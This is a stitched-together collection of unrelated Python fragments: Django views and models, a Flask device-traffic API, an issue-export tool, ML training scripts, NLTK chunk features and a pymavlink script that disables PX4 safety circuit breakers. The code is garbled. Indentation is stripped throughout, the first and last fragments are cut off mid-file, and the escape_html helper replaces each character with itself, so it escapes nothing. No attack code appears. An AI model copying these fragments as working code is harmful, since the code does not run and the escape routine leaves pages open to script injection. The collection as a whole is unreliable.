if __name__ == "__main__":
main()
|
import pytest
from django.urls import reverse
@pytest.mark.django_db
@pytest.mark.parametrize("view", ["inventory:inventory_list"])
def test_view_inventory_list(client, view):
url = reverse(view)
response = client.get(url)
# content = response.content.decode(encoding=response.charset)
assert response.status_code < 400
|
HEX_COLOURS = {"blueviolet": "#8a2be2", "brown": "#a52a2a", "coral": "#ff7f50"}
colour_name = input("Enter a colour name: ")
while colour_name != "":
print("The code for {} is {}".format(colour_name, HEX_COLOURS.get(colour_name)))
colour_name = input("Enter a colour name: ")
|
import RPi.GPIO as GPIO
import time
sensor = 12
value = 0
GPIO.setmode(GPIO.BOARD)
GPIO.setup(sensor, GPIO.IN)
while True:
print GPIO.input(sensor)
time.sleep(0.5) # small delay so the loop does not spin at full speed
|
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
def still_alive(function):
def wrap(request, *args, **kwargs):
if not request.user.is_authenticated():
#TODO add the 'next': request.GET.get('next', '')}
return HttpResponseRedirect(reverse('index'))
if request.user.character_set.filter(alive=True).exists():
return function(request, *args, **kwargs)
else:
return HttpResponseRedirect(reverse('create_character'))
return wrap
|
from __future__ import print_function
# import mavutil
from pymavlink import mavutil
from dronekit import connect, VehicleMode
import time
# create the connection
# From topside computer
connection_string = '/dev/ttyACM0'
master = mavutil.mavlink_connection(connection_string)
master.wait_heartbeat()
master.mav.param_request_list_send(master.target_system, master.target_component)
master.mav.param_request_read_send(master.target_system, master.target_component, b'CBRK_IO_SAFETY', -1)
print('param recv complete')
'''
while True:
try:
message = master.recv_match(type='PARAM_VALUE', blocking=True).to_dict()
print('name: %s\tvalue: %f' % (message['param_id'].decode("utf-8"), message['param_value']))
except Exception as e:
print(e)
exit(0)
'''
time.sleep(0.5)
# Set io process
master.mav.param_set_send(master.target_system, master.target_component, b'CBRK_IO_SAFETY', 0, mavutil.mavlink.MAV_PARAM_TYPE_INT32)
print('io set complete')
# read ACK, IMPORTANT
num=0
message=None
while num<50:
try:
message = master.recv_match().to_dict()
num=num+1
except Exception as e:
break
# request param to confirm
master.mav.param_request_read_send(master.target_system, master.target_component, b'CBRK_IO_SAFETY', -1)
print('io request complete')
# USB set
master.mav.param_request_read_send(master.target_system, master.target_component, b'CBRK_USB_CHK', -1)
master.mav.param_set_send(master.target_system, master.target_component, b'CBRK_USB_CHK', 0, mavutil.mavlink.MAV_PARAM_TYPE_INT32)
# read ACK, IMPORTANT
num=0
message=None
while num<50:
try:
message = master.recv_match().to_dict()
num=num+1
except Exception as e:
break
master.mav.param_request_read_send(master.target_system, master.target_component, b'CBRK_USB_CHK', -1)
print('USB check complete')
'''
# set SUPPLY
#
#
master.mav.param_set_send(master.target_system, master.target_component, b'CBRK_SUPPLY_CHK', 0, mavutil.mavlink.MAV_PARAM_TYPE_INT32)
# read ACK, IMPORTANT
num=0
message=None
while num<50:
try:
message = master.recv_match().to_dict()
#print('name: %s\tvalue: %f' % (message['param_id'].decode("utf-8"), message['param_value']))
num=num+1
except Exception as e:
break
master.mav.param_request_read_send(master.target_system, master.target_component, b'CBRK_SUPPLY_CHK', -1)
print('SUPPLY check complete')
'''
#reboot
master.close()
vehicle = connect(connection_string, wait_ready=True)
vehicle.reboot()
print('reboot?')
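# --- Hedged refactoring sketch (not part of the original script) ---
# The parameter updates above repeat the same pattern: send PARAM_SET, drain up to 50
# queued messages so the PARAM_VALUE ack is consumed, then re-request the value. A
# helper like this captures that pattern; the name is hypothetical, the calls are the
# same pymavlink calls used above.
def set_param_and_confirm(conn, param_id, value, max_drain=50):
    conn.mav.param_set_send(conn.target_system, conn.target_component,
                            param_id, value, mavutil.mavlink.MAV_PARAM_TYPE_INT32)
    for _ in range(max_drain):
        try:
            conn.recv_match().to_dict()
        except Exception:
            break
    conn.mav.param_request_read_send(conn.target_system, conn.target_component, param_id, -1)
# Example (same parameters as above, on an open connection):
#   set_param_and_confirm(master, b'CBRK_IO_SAFETY', 0)
#   set_param_and_confirm(master, b'CBRK_USB_CHK', 0)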
|
from flask import request, jsonify
from ..models import DeviceModel, FlowModel
from pa import database as db
from sqlalchemy import asc, desc
import pa
from .summary import get_range_summary
from datetime import datetime, timedelta
def get_device():
try:
devices = db.session.query(FlowModel.mac.label('mac'))
devices = devices.group_by(FlowModel.mac).all()
except Exception as e:
        pa.log.error('unable to query table {0}: {1}'.format(FlowModel.__tablename__, e))
        return 'unable to query device', 500
all_device_desc = []
for dev in devices:
try:
device = DeviceModel.query.filter_by(mac=dev.mac).first()
except Exception as e:
            pa.log.error('unable to query table {0}: {1}'.format(DeviceModel.__tablename__, e))
            return 'unable to query device', 500
try:
first_appear = FlowModel.query.filter_by(mac=dev.mac).order_by(asc(FlowModel.create_time)).first()
first_appear_time = first_appear.create_time.strftime('%Y-%m-%d %H:%M:%S')
last_appear = FlowModel.query.filter_by(mac=dev.mac).order_by(desc(FlowModel.create_time)).first()
last_appear_time = last_appear.create_time.strftime('%Y-%m-%d %H:%M:%S')
except Exception as e:
            pa.log.error('unable to query table {0}: {1}'.format(FlowModel.__tablename__, e))
            return 'unable to query device', 500
try:
secondly = get_range_summary(dev.mac, datetime.now()-timedelta(minutes=1), timedelta(minutes=1))
secondly['download'] = int(secondly['download'] / 60)
secondly['upload'] = int(secondly['upload'] / 60)
hourly = get_range_summary(dev.mac, datetime.now()-timedelta(hours=1), timedelta(hours=1))
daily = get_range_summary(dev.mac, datetime.now()-timedelta(days=1), timedelta(days=1))
monthly = get_range_summary(dev.mac, datetime.now()-timedelta(days=31), timedelta(days=31))
except Exception as e:
            pa.log.error('unable to get device summary: {0}'.format(e))
            return 'unable to get device summary', 500
device_desc = {
'mac': dev.mac,
'first_record_time': first_appear_time,
'last_record_time': last_appear_time,
'last_record_ip': last_appear.ip,
'secondly': {
'upload': secondly['upload'],
'download': secondly['download']
},
'hourly': {
'upload': hourly['upload'],
'download': hourly['download']
},
'daily': {
'upload': daily['upload'],
'download': daily['download']
},
'monthly': {
'upload': monthly['upload'],
'download': monthly['download']
}
}
if device is not None:
device_desc['name'] = device.name
device_desc['type'] = device.type
device_desc['comment'] = device.comment
device_desc['create_time'] = device.create_time.strftime('%Y-%m-%d %H:%M:%S')
all_device_desc.append(device_desc)
try:
devices = DeviceModel.query.all()
except Exception as e:
        pa.log.error('unable to query table {0}: {1}'.format(DeviceModel.__tablename__, e))
        return 'unable to query device', 500
for device in devices:
device_exists = False
for device_desc in all_device_desc:
if device_desc.get('mac') == device.mac:
device_exists = True
break
if device_exists:
continue
all_device_desc.append({
'mac': device.mac,
'name': device.name,
'type': device.type,
'comment': device.comment,
'create_time': device.create_time.strftime('%Y-%m-%d %H:%M:%S')
})
return jsonify(all_device_desc), 200
def set_device():
mac = request.json.get('mac')
device_name = request.json.get('name')
device_type = request.json.get('type')
device_comment = request.json.get('comment')
if mac is None or len(mac) == 0:
return 'mac format error', 400
if device_name is None and device_type is None and device_comment is None:
return 'name, type, comment are None', 400
try:
device = DeviceModel.query.filter_by(mac=mac).first()
except Exception as e:
        pa.log.error('unable to query table {0}: {1}'.format(DeviceModel.__tablename__, e))
        return 'unable to query device', 500
create_device = False
if device is None:
create_device = True
device = DeviceModel(mac=mac)
if device is None:
return 'device not found', 400
if device_name is not None:
device.name = device_name
if device_type is not None:
device.type = device_type
if device_comment is not None:
device.comment = device_comment
try:
if create_device:
db.session.add(device)
db.session.commit()
except Exception as e:
        pa.log.error('unable to write table {0}: {1}'.format(DeviceModel.__tablename__, e))
        return 'unable to write device', 500
return '', 200
|
from django.db import models
from django.contrib.auth import get_user_model
class HealthEntry(models.Model):
user = models.ForeignKey(
get_user_model(), on_delete=models.CASCADE, null=True, blank=True
)
age = models.IntegerField(default=0)
gender = models.CharField(
choices=(("M", "Male"), ("F", "Female")), default="M", max_length=1,
)
fever = models.BooleanField(default=False)
cough = models.BooleanField(default=False)
difficult_breathing = models.BooleanField(default=False)
self_quarantine = models.BooleanField(default=False)
latitude = models.DecimalField(max_digits=18, decimal_places=15, null=True)
longitude = models.DecimalField(max_digits=18, decimal_places=15, null=True)
unique_id = models.CharField(null=True, blank=True, max_length=15)
creation_timestamp = models.DateTimeField(auto_now_add=True, null=True, blank=True)
class KeyValuePair(models.Model):
name = models.CharField(max_length=50)
value = models.CharField(max_length=100)
|
#!/usr/bin/env python
import os
import sys
import dotenv
BASE_DIR = os.path.join(os.path.dirname(__file__), os.pardir)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
os.environ.setdefault("ENV", "default")
def run_gunicorn_server(addr, port):
"""run application use gunicorn http server
"""
from gunicorn.app.base import Application
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
class DjangoApplication(Application):
def init(self, parser, opts, args):
return {
'bind': '{0}:{1}'.format(addr, port),
'workers': 4,
'timeout': 300,
'accesslog': '-'
}
def load(self):
return application
DjangoApplication().run()
if __name__ == "__main__":
from django.core.management import execute_from_command_line
env_file = os.path.abspath(
os.path.join('%s/envs' % BASE_DIR, "%s.env" % os.getenv('ENV')))
print('*' * 80)
print("Read environment from '{}'".format(env_file))
print('*' * 80)
dotenv.read_dotenv(env_file)
addr = os.getenv('DJANGO_HTTP_ADDR', '127.0.0.1')
port = os.getenv('DJANGO_HTTP_PORT', '8000')
server_type = os.getenv('DJANGO_SERVER_TYPE', 'dev')
if(len(sys.argv) == 2 and sys.argv[1] == 'runserver'):
if server_type != 'dev':
run_gunicorn_server(addr=addr, port=port)
sys.exit(0)
sys.argv.append('%s:%s' % (addr, port))
execute_from_command_line(sys.argv)
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for converting Google Code issues to a format accepted by BitBucket.
Most BitBucket concepts map cleanly to their Google Code equivalent, with the
exception of the following:
- Issue Assignee is called an Owner
- Issue Reporter is called an Author
- Comment User is called an Author
"""
import argparse
import json
import sys
import issues
def _getKind(kind):
mapping = {
"defect": "bug",
"enhancement": "enhancement",
"task": "task",
"review": "proposal",
"other": "bug",
}
return mapping.get(kind.lower(), "bug")
def _getPriority(priority):
mapping = {
"low": "trivial",
"medium": "minor",
"high": "major",
"critical": "critical",
}
return mapping.get(priority.lower(), "minor")
def _getStatus(status):
mapping = {
"new": "new",
"fixed": "resolved",
"invalid": "invalid",
"duplicate": "duplicate",
"wontfix": "wontfix",
}
return mapping.get(status.lower(), "new")
def _getTitle(title):
if len(title) < 255:
return title
return title[:250] + "[...]"
class UserService(issues.UserService):
"""BitBucket user operations.
"""
def IsUser(self, username):
"""Returns wheter a username is a valid user.
BitBucket does not have a user api, so accept all usernames.
"""
return True
class IssueService(issues.IssueService):
"""Abstract issue operations.
    Handles creating and updating issues and comments on a user API.
"""
def __init__(self):
self._bitbucket_issues = []
self._bitbucket_comments = []
def GetIssues(self, state="open"):
"""Gets all of the issue for the repository.
Since BitBucket does not have an issue API, always returns an empty list.
Args:
state: The state of the repository can be either 'open' or 'closed'.
Returns:
An empty list.
"""
return []
def CreateIssue(self, googlecode_issue):
"""Creates an issue.
Args:
googlecode_issue: An instance of GoogleCodeIssue
Returns:
The issue number of the new issue.
Raises:
ServiceError: An error occurred creating the issue.
"""
bitbucket_issue = {
"assignee": googlecode_issue.GetOwner(),
"content": googlecode_issue.GetDescription(),
"content_updated_on": googlecode_issue.GetContentUpdatedOn(),
"created_on": googlecode_issue.GetCreatedOn(),
"id": googlecode_issue.GetId(),
"kind": _getKind(googlecode_issue.GetKind()),
"priority": _getPriority(googlecode_issue.GetPriority()),
"reporter": googlecode_issue.GetAuthor(),
"status": _getStatus(googlecode_issue.GetStatus()),
"title": _getTitle(googlecode_issue.GetTitle()),
"updated_on": googlecode_issue.GetUpdatedOn()
}
self._bitbucket_issues.append(bitbucket_issue)
return googlecode_issue.GetId()
def CloseIssue(self, issue_number):
"""Closes an issue.
Args:
issue_number: The issue number.
"""
def CreateComment(self, issue_number, googlecode_comment):
"""Creates a comment on an issue.
Args:
issue_number: The issue number.
googlecode_comment: An instance of GoogleCodeComment
"""
bitbucket_comment = {
"content": googlecode_comment.GetDescription(),
"created_on": googlecode_comment.GetCreatedOn(),
"id": googlecode_comment.GetId(),
"issue": googlecode_comment.GetIssue().GetId(),
"updated_on": googlecode_comment.GetUpdatedOn(),
"user": googlecode_comment.GetAuthor()
}
self._bitbucket_comments.append(bitbucket_comment)
def WriteIssueData(self, default_issue_kind):
"""Writes out the json issue and comments data to db-1.0.json.
"""
issues_data = {
"issues": self._bitbucket_issues,
"comments": self._bitbucket_comments,
"meta": {
"default_kind": default_issue_kind
}
}
with open("db-1.0.json", "w") as issues_file:
issues_json = json.dumps(issues_data, sort_keys=True, indent=4,
separators=(",", ": "))
issues_file.write(issues_json)
def ExportIssues(issue_file_path, project_name,
user_file_path, default_issue_kind):
"""Exports all issues for a given project.
"""
issue_service = IssueService()
user_service = UserService()
issue_data = issues.LoadIssueData(issue_file_path, project_name)
user_map = issues.LoadUserData(user_file_path, user_service)
issue_exporter = issues.IssueExporter(
issue_service, user_service, issue_data, project_name, user_map)
try:
issue_exporter.Init()
issue_exporter.Start()
issue_service.WriteIssueData(default_issue_kind)
print "\nDone!\n"
except IOError, e:
print "[IOError] ERROR: %s" % e
except issues.InvalidUserError, e:
print "[InvalidUserError] ERROR: %s" % e
def main(args):
"""The main function.
Args:
args: The command line arguments.
Raises:
ProjectNotFoundError: The user passed in an invalid project name.
"""
parser = argparse.ArgumentParser()
parser.add_argument("--issue_file_path", required=True,
help="The path to the file containing the issues from"
"Google Code.")
parser.add_argument("--project_name", required=True,
help="The name of the Google Code project you wish to"
"export")
parser.add_argument("--user_file_path", required=False,
help="The path to the file containing a mapping from"
"email address to bitbucket username")
parser.add_argument("--default_issue_kind", required=False,
help="A non-null string containing one of the following"
"values: bug, enhancement, proposal, task. Defaults to"
"bug")
parsed_args, _ = parser.parse_known_args(args)
# Default value.
if not parsed_args.default_issue_kind:
print "Using default issue kind of 'bug'."
parsed_args.default_issue_kind = "bug"
ExportIssues(
parsed_args.issue_file_path, parsed_args.project_name,
parsed_args.user_file_path, parsed_args.default_issue_kind)
if __name__ == "__main__":
main(sys.argv)
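# --- Hedged illustration (not part of the original tool) ---
# The label-mapping helpers above normalise Google Code metadata into the closed
# vocabularies BitBucket expects, falling back to a safe default for unknown values:
#
#   >>> _getKind("Defect"), _getKind("Review"), _getKind("SomethingElse")
#   ('bug', 'proposal', 'bug')
#   >>> _getPriority("High"), _getStatus("WontFix")
#   ('major', 'wontfix')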
|
"""ChunkedImageLoader class.
This is for pre-Octree Image class only.
"""
import logging
from typing import Optional
from napari.layers.image._image_loader import ImageLoader
from napari.layers.image.experimental._chunked_slice_data import (
ChunkedSliceData,
)
from napari.layers.image.experimental._image_location import ImageLocation
LOGGER = logging.getLogger("napari.loader")
class ChunkedImageLoader(ImageLoader):
"""Load images using the Chunkloader: synchronously or asynchronously.
Attributes
----------
_current : Optional[ImageLocation]
The location we are currently loading or showing.
"""
def __init__(self) -> None:
# We're showing nothing to start.
self._current: Optional[ImageLocation] = None
def load(self, data: ChunkedSliceData) -> bool:
"""Load this ChunkedSliceData (sync or async).
Parameters
----------
data : ChunkedSliceData
The data to load
Returns
-------
bool
True if load happened synchronously.
"""
location = ImageLocation(data.layer, data.indices)
LOGGER.debug("ChunkedImageLoader.load")
if self._current is not None and self._current == location:
# We are already showing this slice, or its being loaded
# asynchronously.
return False
# Now "showing" this slice, even if it hasn't loaded yet.
self._current = location
if data.load_chunks():
return True # Load was sync, load is done.
return False # Load was async, so not loaded yet.
def match(self, data: ChunkedSliceData) -> bool:
"""Return True if slice data matches what we are loading.
Parameters
----------
data : ChunkedSliceData
Does this data match what we are loading?
Returns
-------
bool
Return True if data matches.
"""
location = data.request.location
if self._current == location:
LOGGER.debug("ChunkedImageLoader.match: accept %s", location)
return True
# Data was for a slice we are no longer looking at.
LOGGER.debug("ChunkedImageLoader.match: reject %s", location)
return False
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
variable = 7
if variable > 10:
print "La variable es mayor que diez"
elif variable < 7:
print "La variable es menor que siete"
else:
print "La variable es siete"
print "Esto se muestra siempre"
|
from bsm.util import ensure_list
def _build_steps(cfg):
cfg['build'] = ensure_list(cfg['build'])
try:
make_index = cfg['build'].index('make')
except ValueError:
return
build_step_number = len(cfg['build'])
if make_index > 0 and 'configure' not in cfg['install']:
cfg['install']['configure'] = cfg['build'][make_index-1]
if 'compile' not in cfg['install']:
cfg['install']['compile'] = 'make'
if make_index+1 < build_step_number and 'install' not in cfg['install']:
cfg['install']['install'] = cfg['build'][make_index+1]
def run(param, cfg):
cfg.setdefault('install', {})
if 'source' in cfg and cfg['install'].get('download') == 'http':
if 'main' in cfg['source']:
cfg['install'].setdefault('extract', 'tar')
if 'patch' in cfg:
cfg['install'].setdefault('patch', 'patch')
if 'build' in cfg:
_build_steps(cfg)
if param['category'] == 'cepcsoft' and 'cmake' in cfg.get('build', {}):
cfg.setdefault('cmake', {})
cfg['cmake']['ignore_install_prefix'] = True
cfg['cmake'].setdefault('var', {})
cfg['cmake']['var']['CMAKE_BUILD_TYPE'] = 'RelWithDebInfo'
cfg['cmake']['var']['BUILD_32BIT_COMPATIBLE'] = 'OFF'
cfg['cmake']['var']['INSTALL_DOC'] = 'OFF'
cfg['install'].setdefault('clean', 'clean')
cfg.setdefault('clean', ['build', 'download', 'log'])
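# --- Hedged illustration (not part of the original module) ---
# Given a package whose build is declared as a configure/make/"make install" sequence,
# _build_steps() maps the entries around 'make' onto the named install steps. The cfg
# dict below is hypothetical, and this assumes bsm.util.ensure_list passes lists
# through unchanged.
if __name__ == '__main__':
    example_cfg = {
        'build': ['./configure --prefix=/opt/pkg', 'make', 'make install'],
        'install': {},
    }
    _build_steps(example_cfg)
    print(example_cfg['install'])
    # {'configure': './configure --prefix=/opt/pkg', 'compile': 'make', 'install': 'make install'}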
|
# if n is a positive integer, n! = n(n-1)(n-2)...(3)(2)(1). The product of all positive integers less than or equal to n
# 0! = 1
def factorial(n):
if n < 0:
return('{} is not a positive integer '.format(n))
elif n >= 1:
return(n * factorial(n-1))
else:
return(1)
print(factorial(4))
print(4*3*2*1)
print(factorial(0))
print(factorial(-1))
|
# -*- coding: utf-8 -*-
"""
Main script to train and export GPR Forward models for the Ogden Material
"""
import numpy as np
from random import seed
from sklearn.preprocessing import StandardScaler
import matplotlib.pyplot as plt
from time import time
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import RBF
import PreProcess
import PostProcess
# Metamodel settings
NUM_FEATURES = 2
NUM_OUTPUT = 100
L_ScaleBound = 1e-13
U_ScaleBound = 1e+5
# Training and testing data (number of FEBio simulations)
num_train_list = [50,75,100,250,500, 750,1000, 1500, 2000, 2500, 3000]
valid_sets = list(range(10001,11001))
n_val = len(valid_sets)
star_set = 249 # The ID of one validation test to visualize stress-strain
# Reproduce
np.random.seed(1234)
seed(1234)
# Initialize learning curve dictionary
lc_stats = {'num_train':[], 'train_time':[],'MAE_train': [], 'MAPE_train': [], 'R2_train': [],'MAE_val': [], 'MAPE_val': [], 'R2_val': [] }
# Load data
TestData = PreProcess.OgdenData()
StrainObservs = TestData.FEBio_strain # As is, use all available points
# Separate Validation data
X_val, Y_val = TestData.FE_in_out(valid_sets, strain_vals = StrainObservs )
# Loop Training sets
for kk in range(0, len(num_train_list)):
# Separate Training set
train_num = num_train_list[kk]
print(f'TRAIN_n...{train_num+0:03}')
train_sets = list(range(1, train_num + 1))
X_train, Y_train = TestData.FE_in_out(train_sets, strain_vals = StrainObservs)
# Scale Training Set
scaler = StandardScaler()
scaler.fit(X_train)
# Scale Input Sets
X_train_scaled = scaler.transform(X_train)
X_val_scaled = scaler.transform(X_val)
####### GPR Model ##################
length_scales = np.ones(2)
lscale_bounds = (L_ScaleBound, U_ScaleBound)
kernel = RBF(length_scales,length_scale_bounds = lscale_bounds) #Matern(length_scales)
model = GaussianProcessRegressor(kernel=kernel, alpha=1e-8, random_state=None,n_restarts_optimizer=10)
# Train, fit model
start = time()
model.fit(X_train_scaled, Y_train)
# Find predictions
fX_train = model.predict(X_train_scaled)
fX_val = model.predict(X_val_scaled)
    # Calculate training and evaluation time
end = time()
run_time = (end - start)/60
print('\t run time in mins.....%.2f' %(run_time))
# Initialize utils for post processing
export = PostProcess.ExportData('Ogden', 'GPR_Tuned'+ str(train_num))
# Export total errors after training
lc_stats['num_train'].append(train_num)
lc_stats['train_time'].append(run_time)
lc_stats = export.compute_error(Y_train, fX_train, lc_stats, 'train')
lc_stats = export.compute_error(Y_val, fX_val, lc_stats, 'val')
export.dict_to_csv(lc_stats,'LC')
# Plot star set
fig, (ax1, ax2) = plt.subplots(2,1,figsize=(5,8))
export.stress_strain(Y_val, fX_val, None, lc_stats['MAE_val'][-1] , StrainObservs, star_set, ax1, ax2)
# Plot stress scattered data
R2 = 1-lc_stats['R2_val'][-1]
export.stress_scatter(Y_val,fX_val, R2)
# Export trained models
export.trained_GPRs(scaler, model, train_num, lscale_bounds)
plt.close('all')
# Plot Learning curve
export.learning_curve(num_train_list,lc_stats['MAE_train'],lc_stats['MAE_val'],'MAE')
export.learning_curve(num_train_list,lc_stats['MAPE_train'],lc_stats['MAPE_val'],'MAPE')
export.learning_curve(num_train_list,lc_stats['R2_train'],lc_stats['R2_val'],'R2')
|
from PyQt5.QtSql import QSqlDatabase, QSqlQueryModel, QSqlQuery
from PyQt5.QtWidgets import QTableView, QApplication
import sys
|
# as_util_html.py written by Duncan Murray 7/8/2013 (C) Acute Software
# utility functions for HTML work, mainly from udacity course
import csv
try:
import urllib.request as request
except:
import urllib2 as request
import getpass
import socket
def main():
TEST()
def TEST():
print(" \n --- Testing Net functions --- ")
print(" ------------------------------ ")
print(escape_html("hi there"))
print(escape_html("hi <t>here"))
print('downloading file http://gdeltproject.org/data/lookups/CAMEO.country.txt to test_country.txt')
DownloadFile('http://gdeltproject.org/data/lookups/CAMEO.country.txt', 'test_country.txt')
print('done')
def GetUserName():
return getpass.getuser()
def GetHostName():
return socket.gethostname()
def DownloadFile(url, filename):
output = open(filename,'wb')
output.write(request.urlopen(url).read())
output.close()
def CreateCssString(fontFamily, baseFontSize, linefeed='\n'):
css = "<STYLE>" + linefeed
css = css + "BODY { font-size:" + baseFontSize + "; FONT-FAMILY:" + fontFamily + "; }" + linefeed
css = css + "A:link { font-size:" + baseFontSize + "; COLOR: blue;TEXT-DECORATION:none}" + linefeed
css = css + "A:visited { color: #003399; font-size:" + baseFontSize + ";TEXT-DECORATION:none }" + linefeed
css = css + "A:hover { color:#FF3300;TEXT-DECORATION:underline}" + linefeed
css = css + "TD { font-size:" + baseFontSize + "; valign=top; FONT-FAMILY:Arial; padding: 1px 2px 2px 1px; }" + linefeed
css = css + "H1 { font-size:200%; padding: 1px 0px 0px 0px; margin:0px; }" + linefeed
css = css + "H2 { font-size:160%; FONT-WEIGHT:NORMAL; margin:0px 0px 0px 0px; padding:0px; }" + linefeed
css = css + "H3 { font-size:100%; FONT-WEIGHT:BOLD; padding:1px; letter-spacing:0.1em; }" + linefeed
css = css + "H4 { font-size:140%; FONT-WEIGHT:NORMAL; margin:0px 0px 0px 0px; padding:1px; }" + linefeed
css = css + "</STYLE>" + linefeed
return css
def escape_html(s):
res = s
res = res.replace('&', "&")
res = res.replace('>', ">")
res = res.replace('<', "<")
res = res.replace('"', """)
return res
def BuildHTMLHeader(title, linefeed='\n', border='1'):
res = "<HTML><HEAD><title>" + linefeed
res = res + title + "</title>" + linefeed
#res = res + "<link rel=\"stylesheet\" type=\"text/css\" href=\"" + linefeed
res = res + CreateCssString("Arial", "10pt", linefeed ) + linefeed
# res = res + "\" /></HEAD><BODY><H1>"
res = res + "</HEAD><BODY><H1>"
res = res + title + "</H1><TABLE border=" + border + ">"
return res
def FormatListAsHTMLTableRow(lst):
txt = '<TR>'
for i in lst:
txt = txt + '<TD>' + i + '</TD>'
txt = txt + '</TR>'
print(lst)
print('txt = ' + txt)
return txt
def FormatCsvAsHtml(csvFile, opHTML):
fop = open(opHTML, 'w')
fop.write(BuildHTMLHeader(csvFile))
with open(csvFile) as csv_file:
for row in csv.reader(csv_file, delimiter=','):
fop.write("<TR>")
for col in row:
fop.write("<TD>")
fop.write(col)
fop.write("</TD>")
fop.write("</TR>")
fop.write("</TABLE>")
fop.write("</BODY></HTML>")
fop.close()
def DisplayImagesAsHTML(imageList):
pass
if __name__ == '__main__':
main()
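# --- Hedged usage sketch (illustrative only, not part of the original module) ---
# Building a small report page from in-memory rows with the helpers above; the row
# data and the output file name are hypothetical.
def DemoReport(opHTML='demo_report.html'):
    rows = [['Name', 'Score'], ['alpha', '10'], ['beta', '7']]
    html = BuildHTMLHeader('Demo report')
    for row in rows:
        html = html + FormatListAsHTMLTableRow(row)
    html = html + '</TABLE></BODY></HTML>'
    fop = open(opHTML, 'w')
    fop.write(html)
    fop.close()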
|
#!/usr/bin/python
"""
Starter code for the evaluation mini-project.
Start by copying your trained/tested POI identifier from
that which you built in the validation mini-project.
This is the second step toward building your POI identifier!
Start by loading/formatting the data...
"""
import pickle
import sys
sys.path.append("../tools/")
from feature_format import featureFormat, targetFeatureSplit
data_dict = pickle.load(open("../final_project/final_project_dataset.pkl", "r") )
### add more features to features_list!
features_list = ["poi", "salary"]
data = featureFormat(data_dict, features_list)
labels, features = targetFeatureSplit(data)
### your code goes here
from sklearn.cross_validation import train_test_split
from sklearn import tree
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score
features_train, features_test, labels_train, labels_test = train_test_split(features, labels, test_size=0.30, random_state=42)
clf = tree.DecisionTreeClassifier()
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
acc = round(accuracy_score(labels_test, pred), 5)
print "Accuracy:", acc
poi = 0
for ii in labels_test:
if ii == 1:
poi += 1
print "POIs=", poi
tpos = 0
for n in range(len(pred)):
if pred[n] == 1 and labels_test[n] == 1:
tpos += 1
print "True Positive:", tpos
print "Presicion:", precision_score(labels_test, pred)
print "Recall:", recall_score(labels_test, pred)
print f1_score(labels_test, pred)
predictions = [0, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1]
true_labels = [0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0]
tpos = 0
for n in range(len(predictions)):
    if predictions[n] == 1 and true_labels[n] == 1:
        tpos += 1
print "True Positive TEST:", tpos
print "Precision TEST:", precision_score(true_labels, predictions)
print "Recall TEST:", recall_score(true_labels, predictions)
print f1_score(true_labels, predictions)
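# --- Hedged illustration (not part of the original starter code) ---
# Counting the confusion-matrix cells for the hypothetical labels above by hand makes
# the sklearn numbers easy to verify: precision = TP/(TP+FP), recall = TP/(TP+FN).
tp = sum(1 for p, t in zip(predictions, true_labels) if p == 1 and t == 1)  # 6
fp = sum(1 for p, t in zip(predictions, true_labels) if p == 1 and t == 0)  # 3
fn = sum(1 for p, t in zip(predictions, true_labels) if p == 0 and t == 1)  # 2
print "By hand -> Precision:", float(tp) / (tp + fp), "Recall:", float(tp) / (tp + fn)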
|
# Generated by Django 2.1.7 on 2019-02-26 13:26
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0005_passenger'),
]
operations = [
migrations.RenameField(
model_name='passenger',
old_name='ticket_class',
new_name='pclass',
),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 16-12-4 8:52 PM
# @Author : sadscv
# @File : chunkFreatures.py
def npchunk_features(sentence, i, history):
    """
    Feature extractor.
    :param sentence: list of (word, tag) pairs
    :param i: int, index of the current word in the sentence
    :param history: all chunk tags assigned before position i
    :return: {"pos": pos}
    """
    word, pos = sentence[i]
    return {"pos": pos}
def npchunk_features_with_prevword_and_prevpos(sentence, i, history):
    """
    Adds the word and prevpos features on top of npchunk_features.
    :param sentence: list of (word, tag) pairs
    :param i: index of the current word
    :param history: chunk tags assigned so far
    :return: feature dict
    """
    word, pos = sentence[i]
    if i == 0:
        prevword, prevpos = "<START>", "<START>"
    else:
        prevword, prevpos = sentence[i-1]
    return {"pos": pos, "word": word, "prevpos": prevpos}
def tags_since_dt(sentence, i):
    """
    :param sentence: list of (word, tag) pairs
    :param i: int, index of the current word in the sentence
    :return: the POS tags seen since the most recent determiner before position i.
    For example, "he is the little lovely boy" tagged NN, DT, (JJ, JJ, NN) returns the tags in parentheses.
    """
    tags = set()
    # for every (word, pos) before position i
    for word, pos in sentence[:i]:
        # if the pos is 'DT', reset tags; otherwise add the current pos
        if pos == 'DT':
            tags = set()
        else:
            tags.add(pos)
    return '+'.join(sorted(tags))
def npchunk_features_ultimate(sentence, i, history):
word, pos = sentence[i]
if i == 0:
prevword, prevpos = "<START>", "<START>"
else:
prevword, prevpos = sentence[i-1]
if i == len(sentence)-1:
nextword, nextpos = "<END>", "<END>"
else:
nextword, nextpos = sentence[i+1]
return {
"pos" : pos,
"word" : word,
"prevpos" : prevpos,
"nextpos" : nextpos,
"tags-since-dt" : tags_since_dt(sentence, i),
# "prevpos+pos": "%s+%s" % (prevpos, pos),
# "pos+nextpos": "%s+%s" % (pos, nextpos),
}
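# --- Hedged usage sketch (illustrative only, not part of the original module) ---
# Feeding a small tagged sentence through the richest extractor shows the feature dict
# a chunk tagger would receive for one position; the sentence below is made up.
if __name__ == '__main__':
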